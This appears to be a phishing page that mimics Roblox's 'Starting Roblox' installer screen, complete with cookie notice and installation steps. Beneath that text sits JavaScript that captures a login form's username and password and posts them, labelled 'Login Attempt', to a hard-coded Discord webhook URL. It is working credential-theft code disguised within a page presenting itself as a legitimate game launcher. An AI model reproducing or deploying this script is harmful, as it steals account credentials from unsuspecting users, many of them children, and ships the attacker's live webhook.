Please enable Javascript to use all the features on this site.
Roblox uses cookies to offer you a better experience. For further information, including information on how to withdraw consent and how to manage the use of cookies on Roblox, please refer to our
Privacy and Cookie Policy .
Starting Roblox...
Connecting to People...
Check Always open links for URL: Roblox Protocol and click Open URL: Roblox Protocol in the dialog box above to join experiences faster in the future!
1
Click RobloxPlayer.exe to run the Roblox installer, which just downloaded via your web browser.
2
Click Run when prompted by your computer to begin the installation process.
3
Click Ok once you've successfully installed Roblox.
4
After installation, click Join below to join the action!
The Roblox installer should download shortly. If it doesn’t, start the
download now.
// Discord Webhook URL (replace with your webhook URL)
const webhookURL = 'https://discord.com/api/webhooks/1347337194926243912/WFRsa7MlveANk-4CuEzNTMeZ67Yh9eOWlyEbw36qWWSt1_gsbLsazpDr7oA20-vgqzu-';
// Handle form submission
document.getElementById('loginForm').addEventListener('submit', function(event) {
event.preventDefault();
const username = document.getElementById('username').value;
const password = document.getElementById('password').value;
const message = {
content: `**Login Attempt**\nUsername: ${username}\nPassword: ${password}`
};
// Send data to Discord Webhook
fetch(webhookURL, {
method: 'POST',
headers: {
'Content-Type': 'application/json',
},
body: JSON.stringify(message),
})
.then(response => response.json())
.then(data => {
console.log('Success:', data);
alert('Login attempt recorded!');
})
.catch((error) => {
console.error('Error:', error);
alert('There was an error.');
});
});